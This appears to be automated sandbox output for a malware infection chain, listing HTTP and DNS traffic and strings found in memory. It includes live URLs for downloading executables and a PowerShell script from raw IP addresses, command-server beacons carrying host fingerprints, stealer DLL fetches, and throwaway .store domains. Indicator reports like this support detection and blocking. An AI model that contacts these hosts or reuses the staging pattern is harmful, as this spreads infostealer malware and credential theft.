Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KM3zyh56Yr5CFe3&MD=OeGs9yZU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /l.exe HTTP/1.1Host: freewaylumma.online
Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: freewaylumma.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.deConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /?vhyneVXjVGxXWDBAHPFQ=vMcvSUhjRwUjZHoUBOuO.txt HTTP/1.1Host: cl.oud-cdn.deConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/file1.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/k4pDgO.ps1 HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 11 Nov 2024 22:52:56 GMTIf-None-Match: "67328ac8-1bb200"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowe equals www.youtube.com (Youtube)
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C80f26d8df816a964aafb6ec188b485ed; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b8dd09ab4a897d9d4420b7ba; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35052Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 11 Nov 2024 23:07:37 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control@5 equals www.youtube.com (Youtube)
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: red.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic DNS traffic detected: DNS query: c.msn.com
Source: global traffic DNS traffic detected: DNS query: assets.msn.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: frogmen-smell.sbs
Source: global traffic DNS traffic detected: DNS query: freewaylumma.online
Source: global traffic DNS traffic detected: DNS query: cl.oud-cdn.de
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic DNS traffic detected: DNS query: founpiuer.store
Source: global traffic DNS traffic detected: DNS query: navygenerayk.store
Source: global traffic DNS traffic detected: DNS query: scriptyprefej.store
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: marshal-zhukov.com
Source: unknown DoH DNS queries detected: name: assets.msn.com
Source: unknown DoH DNS queries detected: name: assets.msn.com
Source: unknown DoH DNS queries detected: name: ntp.msn.com
Source: unknown DoH DNS queries detected: name: ntp.msn.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 905sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: 4136f86ac7.exe, 00000025.00000003.3191607562.0000000001580000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exey
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3192063647.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 4136f86ac7.exe, 00000025.00000003.3192063647.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exem
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exeX
Source: 4136f86ac7.exe, 00000025.00000003.3191607562.0000000001580000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/ov
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 4136f86ac7.exe, 00000025.00000002.3261455776.00000000012FA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeI
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeN
Source: 4136f86ac7.exe, 00000025.00000003.3192063647.0000000001564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeO
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exep
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/#
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/2c2e-da81-46d0-b6b6-535557bcc5faXX
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllwd
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll=dL
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllad
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllLp
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
